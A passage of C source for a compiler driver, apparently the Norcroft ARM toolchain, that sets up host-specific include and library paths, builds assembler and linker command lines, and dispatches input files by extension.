#define EXT_VMSTYPES 0x10000L
#define OPT_STATICLOCALS 0x100000L
#define OPT_DEFHINTEGER 0x200000L
#define OPT_DEFDOUBLE 0x400000L
#define OPT_IMPUNDEFINED 0x800000L
#define OPT_CHECKSUB 0x1000000L
#define OPT_NOARGALIAS 0x2000000L
#define OPT_LONGLINES 0x4000000L
#define FFEOPTS 0xfff00000L
#define F66_ONETRIP 1L
#define F66_IOSUBLIST 2L
#define F66_INTRINSGO 4L
#endif /* FORTRAN */
/*************************************************************/
/* */
/* Define the environment information structure */
/* */
/*************************************************************/
#ifdef FORTRAN
# define RISCIX_FORTRAN_PRAGMAX \
(EXT_DOUBLECOMPLEX | EXT_HINTEGER | EXT_CASEFOLD | EXT_LCKEYWORDS |\
EXT_FREEFORMAT | EXT_IMPUNDEFINED | EXT_RECURSION | EXT_AUTO |\
EXT_HOLLERITH | EXT_TOPEXPRESS | EXT_F66 | EXT_MIXEDCOMM |\
EXT_VMSCHARS | EXT_VMSCASTS | EXT_VMSIO | EXT_VMSTYPES |\
OPT_STATICLOCALS | OPT_NOARGALIAS)
#endif
static char *driver_options[] = DRIVER_OPTIONS;
static struct EnvTable
{
int unused;
int32 initial_flags;
int32 initial_pragmax;
const char *include_ansi_path,
*include_pcc_path,
*include_pas_path;
const char *lib_dir;
char *lib_root, *pas_lib_root;
const char *list;
const char *assembler_cmd;
const char *link_cmd;
/* 'output_file' is also used for non-link outputs. */
/* This unix convenience just causes pain here. */
char *output_file;
const char *link_ext;
const char *link_startup,
*profile_startup,
*profile_g_startup;
const char *default_lib,
*host_lib,
*profile_lib,
*fort_lib,
*fort_profile_lib,
*pas_lib;
}
const initSetupenv =
#ifdef DRIVER_ENV
DRIVER_ENV
#else
# ifdef COMPILING_ON_ARM
# ifdef COMPILING_ON_RISC_OS
# ifdef FOR_ACORN
{
/*/* IDJ hack: 06-Jun-94 to make it work for DDE. Needs sorting out! */
0, (KEY_LINK), 0,
/* /* Perhaps $.clib, $.plib etc should be called $.lib */
"$.clib", "$.clib", "$.plib", "", "$.clib.", "$.plib", "l",
"ObjAsm -quit -stamp",
"CHAIN:link", NULL, "",
"", "", "",
"o.stubs", "o.hostlib", "o.ansilib", "o.fortlib", "o.fortlib", "o.plib"
}
# else
{
0, (KEY_LINK), 0,
/* /* Perhaps $.clib, $.plib etc should be called $.lib */
"$.clib", "$.clib", "$.plib", ".", "$.clib", "$.plib", "l",
"ObjAsm",
"CHAIN:link", NULL, "",
"", "", "",
"o.ansilib", "o.hostlib", "o.ansilib", "o.fortlib", "o.fortlib", "o.plib"
}
# endif
# endif
# ifdef COMPILING_ON_UNIX
{
# ifdef FORTRAN
0, (KEY_LINK), RISCIX_FORTRAN_PRAGMAX,
# else
0, (KEY_PCC | KEY_LINK), 0,
# endif
# ifdef RISCiX113
"/usr/include/ansi",
# else
"/usr/include",
# endif
"/usr/include", "/usr/include/iso", "/", "", "", "lst",
"as",
"/usr/bin/ld", "a.out", "",
# ifdef RISCiX113
"/lib/crt0.o", "/lib/mcrt0.o", "/lib/gcrt0.o",
# else
"/usr/lib/crt0.o", "/usr/lib/mcrt0.o", "/usr/lib/gcrt0.o",
# endif
"-lc", "", "-lc_p",
# ifdef FORTRAN_NCLIB
"-lnfc", "-lnfc_p",
# else
"-lF66,-lF77,-lI77,-lU77,-lm", "-lF66_p,-lF77_p,-lI77_p,-lU77_p,-lm_p",
# endif
"-lpc"
}
# endif /* COMPILING_ON_UNIX */
# else /* COMPILING_ON_ARM */
# ifdef COMPILING_ON_MSDOS /* Zortech / WatCom / VC++ on MSDOS */
{
0, (KEY_LINK), 0,
"\\arm\\lib", "\\arm\\lib", "", "\\", "\\arm\\lib", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# ifdef COMPILING_ON_MACINTOSH
/* arm_targetted cross_compilation : fortran & pascal not supported */
/* no default places (no root without knowing volume name) */
{
#ifndef HOST_CANNOT_INVOKE_LINKER
0, (KEY_LINK), 0,
#else
0, 0, 0,
#endif
"", "", "", ":", "", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# ifdef TARGET_IS_ARM
/* arm_targetted cross_compilation : fortran & pascal not supported */
{ 0, KEY_LINK, 0,
"/usr/local/lib/arm", "/usr/local/lib/arm", "", "/", "/usr/local/lib/arm", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# error "No proper DRIVER_ENV information"
# endif /* TARGET_IS_ARM */
# endif /* COMPILING_ON_MACINTOSH */
# endif /* COMPILING_ON_MSDOS */
# endif /* COMPILING_ON_ARM */
#endif /* DRIVER_ENV */
;
static struct EnvTable setupenv;
char const Tool_Name[] = TOOLFILENAME;
#ifdef COMPLING_ON_UNIX
# define Compiling_On_Unix 1
#else
# define Compiling_On_Unix 0
#endif
#if defined(PASCAL)
# define LanguageIsPascal 1
# define LanguageIsFortran 0
#elif defined(FORTRAN)
# define LanguageIsPascal 0
# define LanguageIsFortran 1
#else
# define LanguageIsPascal 0
# define LanguageIsFortran 0
#endif
typedef struct { char const **v; Uint sz; Uint n; } ArgV;
static ArgV cc_arg, cc_fil;
static ArgV ld_arg, ld_fil;
static int cmd_error_count, main_error_count;
static int32 driver_flags;
#ifdef FORTRAN
static int32 pragmax_flags;
#endif
#ifdef HOST_OBJECT_INCLUDES_SOURCE_EXTN
# define OBJ_EXTN LANG_EXTN_STRING ".o"
# define ASM_EXTN LANG_EXTN_STRING ".s"
#else
#ifndef OBJ_EXTN
# define OBJ_EXTN "o"
#endif
#ifndef ASM_EXTN
# define ASM_EXTN "s"
#endif
#endif
static int compiler_exit_status;
void compiler_exit(int status)
{ compiler_exit_status = status;
#ifdef NLS
msg_close(NULL);
#endif
trackfile_finalise();
alloc_finalise();
#ifdef COMPILING_ON_MSDOS
(void) signal(SIGTERM, SIG_DFL);
#endif
if (errors != NULL) fclose(errors);
longjmp(exitbuf, 1);
}
/*
* Join two path names and return the result.
*/
static const char *join_path(const char *root, const char *dir,
const char *name)
{
if (root[0] != '\0' && name[0] != '\0')
{ size_t rootlen = strlen(root),
dirlen = strlen(dir),
namelen = strlen(name);
char *new_name = (char *)PermAlloc((int32)rootlen+(int32)dirlen+(int32)namelen+1);
memcpy(new_name, root, rootlen);
memcpy(new_name+rootlen, dir, dirlen);
memcpy(new_name+rootlen+dirlen, name, namelen+1);
return new_name;
}
return name;
}
#define modifiablecopy(s) join_strs(s, "")
#define PermString(s) modifiablecopy(s)
static char *join_strs(const char *s1, const char *s2)
{
size_t s1len = strlen(s1),
s2len = strlen(s2);
char *s = (char *)PermAlloc((int32)s1len + (int32)s2len + 1);
memcpy(s, s1, s1len);
memcpy(s+s1len, s2, s2len+1);
return s;
}
static void AddArg(ArgV *p, char const *arg)
{
if (p->n >= p->sz) {
void *newv = PermAlloc(sizeof(char **) * 2 * p->sz);
memcpy(newv, p->v, p->sz * sizeof(char **));
p->v = (char const **)newv;
p->sz *= 2;
}
p->v[p->n++] = arg;
}
static char *copy_unparse(UnparsedName *unparse, const char *extn)
{ char *new_name;
size_t n;
UnparsedName u;
/* A NULL extn means use the UnparsedName as-is. A non-NULL extn means */
/* use the extn given and kill any leading path segment. In this case */
/* we modify a local copy of the UnparsedName rather than unparse. */
if (extn)
{ u = *unparse;
u.elen = strlen(extn);
if (u.elen == 0) extn = NULL;
u.extn = extn;
#ifndef HOST_OBJECT_INCLUDES_SOURCE_EXTN
u.path = NULL;
u.plen = 0;
u.vol = NULL;
u.vlen = 0;
u.type &= ~FNAME_ROOTED;
#endif
unparse = &u;
}
/* Allocate space for the returned copy of the name. Allow some spare */
/* for ^ -> .. (several times) + up to 2 extra path separators + a NUL. */
n = unparse->vlen + unparse->plen + unparse->rlen + unparse->elen + 10;
new_name = (char *)PermAlloc(n);
if (fname_unparse(unparse, FNAME_AS_NAME, new_name, n) < 0)
driver_abort("internal fault in \"copy_unparse\""); /* @@@ syserr? */
return new_name;
}
/*
* Get the value of an external environment variable
*/
static char *pathfromenv(char *var, char *ifnull)
{
char *def = var==NULL ? NULL : getenv(var);
if (def == NULL)
return ifnull;
else {
def = modifiablecopy(def);
if (Compiling_On_Unix)
{ char *s = def;
for (; *s != 0; s++) if (*s == ':') *s = ',';
}
return def;
}
}
#ifndef C_INC_VAR
# ifdef COMPILING_ON_RISC_OS
# define C_INC_VAR "c$libroot"
# define C_LIB_VAR "c$libroot"
# define P_INC_VAR "p$libroot"
# define P_LIB_VAR "p$libroot"
# else
# if defined(COMPILING_ON_UNIX) && defined(RELEASE_VSN)
# define C_INC_VAR NULL
# define C_LIB_VAR NULL
# define P_INC_VAR NULL
# define P_LIB_VAR NULL
# else
# define C_INC_VAR "NCC_INCLUDE_PATH"
# define C_LIB_VAR "NCC_LIBRARY_PATH"
# define P_INC_VAR "NPC_INCLUDE_PATH"
# define P_LIB_VAR "NPC_LIBRARY_PATH"
# endif
# endif
#endif
static void get_external_environment(void)
{
char *root = pathfromenv(C_INC_VAR, "");
setupenv = initSetupenv;
if (root[0] != 0)
setupenv.include_ansi_path = setupenv.include_pcc_path = root;
root = pathfromenv(C_LIB_VAR, setupenv.lib_root);
if (root[0] != 0)
{
/* Moreover the 'isalpha' is essential a file-is-rooted test. */
/* similarly 'lib_dir' is just the (host) directory-separator. */
#define lib_fixupname(path) \
if (!Compiling_On_Unix || isalpha(path[0])) \
path = join_path(root, setupenv.lib_dir, path)
lib_fixupname(setupenv.default_lib);
lib_fixupname(setupenv.host_lib);
lib_fixupname(setupenv.profile_lib);
lib_fixupname(setupenv.fort_lib);
lib_fixupname(setupenv.fort_profile_lib);
lib_fixupname(setupenv.link_startup);
lib_fixupname(setupenv.profile_startup);
lib_fixupname(setupenv.profile_g_startup);
}
#ifdef PASCAL
root = pathfromenv(P_INC_VAR, "");
if (root[0] != 0)
setupenv.include_pas_path = root;
root = pathfromenv(P_LIB_VAR, setupenv.pas_lib_root);
if (root[0] != 0)
{ lib_fixupname(setupenv.pas_lib);
}
#endif
}
typedef struct {
char const *name;
char const *val;
} NameVal;
typedef struct {
ToolEnv *t;
ToolEdit_EnumFn *f;
void *arg;
char const *prefix;
size_t prefix_len;
Uint n;
NameVal *matches;
} TE_EnumRec;
typedef struct {
char const *prefix;
size_t prefix_len;
Uint n;
} TE_CountRec;
static int TECount_F(void *arg, char const *name, char const *val) {
TE_CountRec *tp = (TE_CountRec *)arg;
IGNORE(val);
if (tp->prefix_len == 0 || StrnEq(name, tp->prefix, tp->prefix_len))
tp->n++;
return 0;
}
Uint TE_Count(ToolEnv *t, char const *prefix) {
TE_CountRec tr;
tr.prefix = prefix; tr.prefix_len = strlen(prefix);
tr.n = 0;
toolenv_enumerate(t, TECount_F, &tr);
return tr.n;
}
static int TE_EnumEnter(void *arg, char const *name, char const *val) {
TE_EnumRec *tp = (TE_EnumRec *)arg;
if (tp->prefix_len == 0 || StrnEq(name, tp->prefix, tp->prefix_len)) {
tp->matches[tp->n].name = name;
tp->matches[tp->n].val = val;
tp->n++;
}
return 0;
}
static int CFNameVal(void const *a, void const *b) {
NameVal const *ap = (NameVal const *)a;
NameVal const *bp = (NameVal const *)b;
uint32 an = strtoul(&ap->name[3], NULL, 16),
bn = strtoul(&bp->name[3], NULL, 16);
return an < bn ? -1 :
an == bn ? 0 :
1;
}
int Tool_OrderedEnvEnumerate(
ToolEnv *t, char const *prefix, ToolEdit_EnumFn *f, void *arg) {
Uint n = TE_Count(t, prefix);
TE_EnumRec tr;
int rc = 0;
tr.t = t; tr.f = f; tr.arg = arg;
tr.prefix = prefix; tr.prefix_len = strlen(prefix);
if (n != 0) {
Uint i;
tr.matches = (NameVal *)malloc(n * sizeof(NameVal));
tr.n = 0;
toolenv_enumerate(t, TE_EnumEnter, &tr);
qsort(tr.matches, tr.n, sizeof(NameVal), CFNameVal);
for (i = 0; i < tr.n; i++) {
rc = f(arg, tr.matches[i].name, tr.matches[i].val, FALSE);
if (rc != 0) break;
}
free(tr.matches);
}
return rc;
}
Uint TE_Integer(ToolEnv *t, char const *name, Uint def) {
char const *tval = toolenv_lookup(t, name);
if (tval == NULL || tval[0] != '=') return def;
return (Uint)strtoul(&tval[1], NULL, 10);
}
bool TE_HasValue(ToolEnv *t, char const *name, char const *val) {
char const *tval = toolenv_lookup(t, name);
return tval != NULL && StrEq(val, tval);
}
/*************************************************************/
/* */
/* Find a command line keyword and return flag */
/* */
/*************************************************************/
/* full case-insensitive */
bool cistreq(const char *s1, const char *s2) {
for ( ; ; ) {
int ch1 = *s1++, ch2 = *s2++;
if (safe_tolower(ch1) != safe_tolower(ch2)) return NO;
if (ch1 == 0) return YES;
}
}
/* full case-insensitive */
bool cistrneq(const char *s1, const char *s2, size_t n) {
while (0 < n--) {
int ch1 = *s1++, ch2 = *s2++;
if (safe_tolower(ch1) != safe_tolower(ch2)) return NO;
if (ch1 == 0) return YES;
}
return YES;
}
/*************************************************************/
/* */
/* Add an option to a link or assembler command. */
/* */
/*************************************************************/
static int32 cmd_cat(char *cmd, int32 posn, const char *extra)
{
size_t l = strlen(extra);
if (posn != 0 && l != 0)
{
if (cmd != NULL) cmd[posn] = ' ';
++posn;
}
if (cmd != NULL && l != 0) memcpy(cmd + posn, extra, l+1);
return posn + l;
}
/*************************************************************/
/* */
/* Call the assembler to assemble a '.s' file */
/* */
/*************************************************************/
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER
#ifndef target_asm_options_
# define target_asm_options_(x) ""
#endif
static int assembler(ToolEnv *t, const char *asm_file, const char *obj_file)
{
int32 flags = driver_flags;
char *cmd;
char small_cmd[SMALL_COMMAND];
alloc_perfileinit();
#ifndef NO_CONFIG
config_init(t);
#endif
cmd = NULL;
for (;;)
{ /* once round to count the length and once to copy the strings... */
int32 cmdlen = cmd_cat(cmd, 0, setupenv.assembler_cmd);
cmdlen = cmd_cat(cmd, cmdlen, target_asm_options_(t));
if (flags & KEY_DEBUG) cmdlen = cmd_cat(cmd, cmdlen, " -g");
if (flags & KEY_READONLY) cmdlen = cmd_cat(cmd, cmdlen, " -R");
if (!Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, asm_file);
if (Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, "-o");
cmdlen = cmd_cat(cmd, cmdlen, obj_file);
if (Compiling_On_Unix) cmdlen = cmd_cat(cmd, cmdlen, asm_file);
if (cmd != NULL) break;
if (cmdlen < SMALL_COMMAND)
cmd = small_cmd;
else
cmd = (char *)SynAlloc(cmdlen+1);
}
if (driver_flags & KEY_VERIFY) cc_msg("[%s]\n", cmd);
{ int rc = system(cmd);
drop_local_store();
return rc;
}
}
#endif
/*************************************************************/
/* */
/* Link compiled files together */
/* */
/*************************************************************/
#ifndef target_lib_name_
# define target_lib_name_(e,x) x
#endif
#ifndef HOST_CANNOT_INVOKE_LINKER
#ifndef LINKER_IS_SUBPROGRAM
typedef struct {
char *cmd;
int32 cmdlen;
ToolEnv *t;
} LinkerLibRec;
static int LibEnum_F(void *arg, char const *name, char const *val, bool readonly) {
LinkerLibRec *llr = (LinkerLibRec *)arg;
IGNORE(readonly); IGNORE(name);
llr->cmdlen = cmd_cat(llr->cmd, llr->cmdlen, target_lib_name_(llr->t, &val[1]));
return 0;
}
#else
typedef struct {
char **argv;
int count;
ToolEnv *t;
} LinkerLibRec;
static int LibEnum_F(void *arg, char const *name, char const *val, bool readonly) {
LinkerLibRec *llr = (LinkerLibRec *)arg;
IGNORE(readonly); IGNORE(name);
llr->argv[llr->count++] = modifiablecopy(target_lib_name_(llr->t, &val[1]));
return 0;
}
#endif
static void linker(ToolEnv *t, int32 flags)
{
#ifdef TARGET_IS_NULL /* Hmmm, but, but ... */
IGNORE(flags);
#else
Uint count;
const char *startup;
alloc_perfileinit();
#ifndef NO_CONFIG
config_init(t);
#endif
switch (flags & (KEY_PROFILE | KEY_XPROFILE))
{
case KEY_PROFILE: startup = setupenv.profile_startup; break;
case KEY_XPROFILE: startup = setupenv.profile_g_startup; break;
default: startup = setupenv.link_startup; break;
}
#ifndef LINKER_IS_SUBPROGRAM
{ char *cmd = NULL;
int32 cmdlen, libstart;
char small_cmd[SMALL_COMMAND];
for (;;)
{ /* once round to count the length and once to copy the strings... */
cmdlen = 0;
cmdlen = cmd_cat(cmd, cmdlen, setupenv.link_cmd);
for (count = 0; count < ld_arg.n; ++count)
cmdlen = cmd_cat(cmd, cmdlen, ld_arg.v[count]);
cmdlen = cmd_cat(cmd, cmdlen, "-o");
cmdlen = cmd_cat(cmd, cmdlen, setupenv.output_file);
cmdlen = cmd_cat(cmd, cmdlen, startup);
for (count = 0; count < ld_fil.n; ++count)
cmdlen = cmd_cat(cmd, cmdlen, ld_fil.v[count]);
libstart = cmdlen;
if (flags & KEY_HOST_LIB)
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.host_lib));
#ifdef PASCAL
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.pas_lib));
#endif
#ifdef FORTRAN
cmdlen = cmd_cat(cmd, cmdlen, target_lib_name_(t, setupenv.fort_lib));
#endif
{ LinkerLibRec llr;
llr.cmd = cmd; llr.cmdlen = cmdlen; llr.t = t;
Tool_OrderedEnvEnumerate(t, "-L.", LibEnum_F, &llr);
cmdlen = llr.cmdlen;
}
if (cmd != NULL) break;
if (cmdlen < SMALL_COMMAND)
cmd = small_cmd;
else
cmd = (char *)SynAlloc(cmdlen+1);
}
for (; libstart < cmdlen; libstart++)
{ /* space-separate, rather than comma-join, the library list */
if (cmd[libstart] == ',') cmd[libstart] = ' ';
}
if (driver_flags & KEY_VERIFY) cc_msg("[%s]\n", cmd);
count = system(cmd);
}
#else /* LINKER_IS_SUBPROGRAM */
{ char **argv = (char **)SynAlloc((ld_arg.n+ld_fil.n+7+TE_Count(t, "-L.")) * sizeof(char **));
extern int do_link(int argc, char **argv, backchat_Messenger *bc, void *bcarg);
argv[0] = modifiablecopy(setupenv.link_cmd);
memcpy(&argv[1], ld_arg.v, ld_arg.n * sizeof(char **));
count = ld_arg.n+1;
argv[count++] = "-o";
argv[count++] = modifiablecopy(setupenv.output_file);
if (*startup != 0) argv[count++] = modifiablecopy(startup);
memcpy(&argv[count], ld_fil.v, ld_fil.n * sizeof(char **));
count += ld_fil.n;
if (flags & KEY_HOST_LIB)
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.host_lib));
#ifdef PASCAL
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.pas_lib));
#endif
#ifdef FORTRAN
argv[count++] = modifiablecopy(target_lib_name_(t, setupenv.fort_lib));
#endif
{ LinkerLibRec llr;
llr.argv = argv; llr.count = count; llr.t = t;
Tool_OrderedEnvEnumerate(t, "-L.", LibEnum_F, &llr);
count = llr.count;
}
argv[count] = 0;
count = do_link(count, argv, backchat.send, backchat.handle);
}
#endif /* LINKER_IS_SUBPROGRAM */
if (count != 0) ++main_error_count;
/*
* In PCC mode delete the '.o' file if only one file was compiled.
* NB. (count==0) is used to check the link was ok.
*/
if ((LanguageIsPascal || StrEq(toolenv_lookup(t, ".lang"), "=-pcc"))
&& cc_fil.n == 1 && ld_fil.n == 1 && count == 0)
remove(ld_fil.v[0]);
drop_local_store();
#endif /* TARGET_IS_NULL */
}
#endif /* HOST_CANNOT_INVOKE_LINKER */
static int PrintEnv(void *arg, char const *name, char const *val) {
IGNORE(arg);
cc_msg(" %s %s", name, val);
return 0;
}
/*
* Process input file names.
*/
static void process_file_names(ToolEnv *t, ArgV *v)
{
Uint count, filc = v->n;
int32 flags = driver_flags;
UnparsedName unparse;
/*
* Reset cc_filc here - we use it to count the actual number of .c files
* (so linker() can delete the intermediate object file in the case that
* there is exactly 1 C file), rather than the number of files to be
* processed by this function.
*/
cc_fil.n = 0;
for (count = 0; count < filc; ++count)
{ char const *current = v->v[count];
int state = 0; /* hack for contorted program flow */
int extn_ch;
char *source_file, *listing_file = NULL, *md_file = NULL;
if (strlen(current) > MAX_TEXT-5)
{ cc_msg_lookup(driver_ignored_filename_overlong, current);
continue;
}
fname_parse(current, FNAME_SUFFIXES, &unparse);
#ifndef COMPILING_ON_UNIX
if (unparse.extn == NULL)
/* On non-Unix hosts use a sensible default if no extension was given */
#ifdef FOR_ACORN
if (!cplusplus_flag)
#endif
{ unparse.extn = LANG_EXTN_STRING;
unparse.elen = sizeof(LANG_EXTN_STRING)-1;
}
extn_ch = unparse.extn[0];
#else
if (unparse.extn == NULL)
extn_ch = 0;
else
extn_ch = unparse.extn[0];
#endif
switch(extn_ch)
{
#ifndef HOST_CANNOT_INVOKE_LINKER
# ifdef COMPILING_ON_UNIX
case 'a':
# else
case 'O':
# endif
case 'o': if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{
AddArg(&ld_fil, copy_unparse(&unparse, NULL));
break;
}
else cc_msg_lookup(driver_conflict_EM);
/* and fall through ... */
#endif
default: if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{ if ((flags & KEY_CFRONTPREPROCESS) != 0) goto case_lang_extn;
cc_msg_lookup(driver_unknown_filetype, current);
++cmd_error_count;
continue;
}
/* fall through again (-E, -M) */
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER
/* The logical place for this code is at NO_OBJECT.. after ccom() call. */
# ifndef COMPILING_ON_UNIX
case 'S':
# endif
case 's': if (!(flags & (KEY_PREPROCESS+KEY_MAKEFILE)))
{ const char *asm_file = copy_unparse(&unparse, NULL);
const char *obj_file = copy_unparse(&unparse, OBJ_EXTN);
state = 1;
if (assembler(t, asm_file, obj_file) != 0)
{ main_error_count++;
remove(obj_file);
}
/* and fall through... foo.s... */
}
/* fall through again (-E, -M, foo.s) */
#endif
#ifdef COMPILING_ON_UNIX
case LANG_UC_EXTN: /* unix foo.C for C++ (rework other hosts?) */
case 'i': /* for X/Open compliance (what about '.I'?) */
#else
case LANG_UC_EXTN:
#endif
case_lang_extn:
case LANG_EXTN:
{ char *out_file = setupenv.output_file;
char *out_name = NULL;
if ((flags & KEY_RENAME) && filc == 1 && !(flags & KEY_LINK))
/* Assert: KEY_RENAME => setupenv.output_file != NULL */
out_name = out_file;
else if (flags & KEY_ASM_OUT)
out_name = copy_unparse(&unparse, ASM_EXTN);
#ifdef NO_OBJECT_OUTPUT2
/* Turn "cc -c foo.c" into "cc -S foo.c"; as foo.s" */
if (!(flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)))
out_name = copy_unparse(&unparse, ASM_EXTN);
#endif
if (flags & KEY_LISTING)
listing_file = copy_unparse(&unparse, setupenv.list);
if (flags & KEY_MD)
md_file = copy_unparse(&unparse, "d");
source_file = copy_unparse(&unparse, NULL);
if (out_file == NULL /* No default output file */
|| filc != 1 /* more than 1 file */
|| (flags & KEY_LINK) /* going to link */
|| !(flags & KEY_RENAME)) /* no -o <file> */
{
out_file = copy_unparse(&unparse, OBJ_EXTN);
}
/* else...
* -o && no-link && 1-file && default-op-file
*/
if (out_name == NULL) out_name = out_file;
if (!(flags & (KEY_MAKEFILE+KEY_PREPROCESS)))
{
AddArg(&ld_fil, out_file);
if (state == 1)
/* already called the assembler so... */ break;
}
if (flags & KEY_VERIFY) {
cc_msg("[");
toolenv_enumerate(t, PrintEnv, NULL);
cc_msg("]\n");
}
if (ccom(t, source_file, out_name, listing_file, md_file))
{ ++main_error_count;
#ifdef COMPILING_ON_RISC_OS
/* The next line is dirty and should be done by checking return code, */
/* not peeking at other's variables. */
if (errorcount) /* only delete o/p file if serious errors */
#endif
remove(out_name);
}
#ifdef NO_OBJECT_OUTPUT2 /* @@@ '2' is a temp hack */
#ifndef HOST_CANNOT_INVOKE_ASSEMBLER
if (!(flags & (KEY_PREPROCESS|KEY_MAKEFILE|KEY_ASM_OUT)))
{ if (assembler(t, out_name, out_file) != 0)
{ main_error_count++;
remove(out_file);
}
remove(out_name);
}
#endif
#endif
}
/* and for the benefit of linker(), count the sources */
++cc_fil.n;
break;
}
/*
* If no output file has been given, derive one from the 1st file name.
*/
if (setupenv.output_file == NULL && (flags & KEY_LINK))
setupenv.output_file = copy_unparse(&unparse, setupenv.link_ext);
}
}
#ifdef FORTRAN
# define FortranUnimplementedOption(ch,current)\
if (current[1] == ch) { nimp_option(current); break; }
#else
# define FortranUnimplementedOption(ch,current)
#endif
/*************************************************************/
/* */
/* Validate the command line keywords */
/* */
/*************************************************************/
static void validate_flags(void)
{
int32 flags = driver_flags;
#ifdef WANT_WHINGY_MSGS_EVEN_WHEN_WRONG
if (ld_arg.n != 0 && !(flags & KEY_LINK))
/* Beware: the next line catches most curios, but not -lxxx */
cc_msg_lookup(driver_ignored_linkerflags);
#endif
if (Compiling_On_Unix && (flags & KEY_HOST_LIB))
{ cc_msg_lookup(driver_ignored_arthur_unix);
flags &= ~KEY_HOST_LIB;
}
if (flags & KEY_COMMENT && !(flags & KEY_PREPROCESS)) flags &= ~KEY_COMMENT;
if ((flags & (KEY_MAKEFILE+KEY_PREPROCESS+KEY_MD)) ==
(KEY_MAKEFILE+KEY_PREPROCESS))
{
cc_msg_lookup(driver_conflict_EM);
flags &= ~KEY_MAKEFILE;
}
if (flags & KEY_PROFILE && flags & KEY_XPROFILE) flags &= ~KEY_PROFILE;
#ifdef FORTRAN
if (flags & KEY_STRICT)
{ if (flags & KEY_ONETRIP)
{ cc_msg_lookup(driver_conflict_strict_onetrip);
flags &= ~KEY_ONETRIP;
}
if (flags & KEY_F66)
{ cc_msg_lookup(driver_conflict_strict_f66);
flags &= ~KEY_F66;
}
if (flags & KEY_LONGLINES)
{ cc_msg_lookup(driver_conflict_strict_extend);
flags &= ~KEY_LONGLINES;
}
}
if ((flags & KEY_F66) && (flags & KEY_ONETRIP))
{ cc_msg_lookup(driver_implies_f66_onetrip);
flags &= ~KEY_ONETRIP;
}
#endif
driver_flags = flags;
}
static void give_help(const char *command_name)
{
#ifdef HOST_WANTS_NO_BANNER
msg_printf(driver_banner);
#endif
#ifdef TIME_LIMIT
{ time_t expire = TIME_LIMIT;
msg_fprintf(driver_expire,VENDOR_NAME,ctime(&expire));
}
#endif
{ msg_t *p = driver_help_text;
msg_printf(*p, command_name);
while (*++p != NULL) msg_printf(*p,command_name);
}
}
/*************************************************************/
/* */
/* Set command line options for current flags */
/* */
/*************************************************************/
#ifdef FORTRAN
static char pragmax[16];
static char pragmaw[16];
#endif
static void set_flag_options(ToolEnv *t)
{
#ifdef FORTRAN
int32 flags = driver_flags;
int32 pragmaw_flags = 0;
if (flags & KEY_ONETRIP) pragmaw_flags |= F66_ONETRIP;
if (flags & KEY_F66)
pragmaw_flags |= (F66_ONETRIP + F66_IOSUBLIST + F66_INTRINSGO);
if (flags & KEY_LONGLINES) pragmax_flags |= OPT_LONGLINES;
if (flags & KEY_STRICT) pragmax_flags = 0;
sprintf(pragmaw, "-zpw%-lu", pragmaw_flags);
sprintf(pragmax, "-zpx%-lu", pragmax_flags);
new_cc_arg(pragmaw);
new_cc_arg(pragmax);
#endif
#if defined(TARGET_IS_UNIX) && defined (COMPILING_ON_ACORN_KIT)
/* Remove -ZS<system> and -ZI<file> if -strict... */
/* AM: why? Maybe of more general use? */
if (driver_flags & KEY_STRICT)
{ tooledit_insert(t, "-ZI", NULL);
tooledit_insert(t, "-ZS", NULL);
}
#else
IGNORE(t);
#endif
}
static void bad_option(const char *opt)
{
cc_msg_lookup(driver_option_bad, opt);
++cmd_error_count;
}
#ifdef FORTRAN
static void nimp_option(const char *opt)
{
cc_msg_lookup(driver_option_nimp, opt);
++cmd_error_count;
}
#endif
typedef struct {
char const *prefix;
size_t prefixlen;
uint32 n;
} FindLastRec;
static int FindLast_F(void *arg, char const *name, char const *val) {
FindLastRec *fr = (FindLastRec *)arg;
IGNORE(val);
if (StrnEq(name, fr->prefix, fr->prefixlen)) {
uint32 n = strtoul(&name[fr->prefixlen], NULL, 16);
if (n > fr->n) fr->n = n;
}
return 0;
}
static uint32 FindLast(ToolEnv *t, char const *prefix) {
FindLastRec fr;
fr.prefix = prefix; fr.prefixlen = strlen(prefix); fr.n = 0;
toolenv_enumerate(t, FindLast_F, &fr);
return fr.n;
}
static void AddInclude(ToolEnv *t, char const *prefix, char const *val) {
char b[FILENAME_MAX+16];
uint32 n = FindLast(t, prefix);
sprintf(b, "%s%lx.%s", prefix, (long)((n + 0x1fffff) & ~0xfffff), val);
tooledit_insertwithjoin(t, b, '=', val);
}
static struct { char const *name; char const *alias; } const EnvNames[] =
{ { ".-Isearch",".fk" },
{ ".rolits", ".fw" },
{ ".enums", ".fy" },
{ ".swilr", ".fz" }
};
static char const *EnvName(char const *alias) {
Uint i;
for (i = 0; i < sizeof(EnvNames) / sizeof(EnvNames[0]); i++)
if (StrEq(alias, EnvNames[i].alias))
return EnvNames[i].name;
return alias;
}
static void EnvFlagSet(ToolEnv *t, char const *opts, int type, char const *valid, bool ignoreerrors) {
char name[4]; char val[8];
bool plus = NO;
int opt;
for (; (opt = *opts) != 0; ++opts)
if (opt == '+')
plus = YES;
else if (opt == '-')
plus = NO;
else {
int ch = safe_tolower(opt);
if (strchr(valid, ch) == 0) {
if (!ignoreerrors) cc_warn(warn_option_letter, type, opt);
} else {
sprintf(name, ".%c%c", type, ch);
if (plus)
sprintf(val, "=-%c+%c", type, ch);
else
sprintf(val, "=-%c%c", type, ch);
tooledit_insert(t, EnvName(name), val);
}
}
}
static void AddDefine(ToolEnv *t, char const *s) {
char b[256];
char *equalp = strchr(s, '=');
if (equalp == NULL) {
sprintf(b, "-D%s", s);
tooledit_insert(t, b, "?");
} else {
int l = equalp-s;
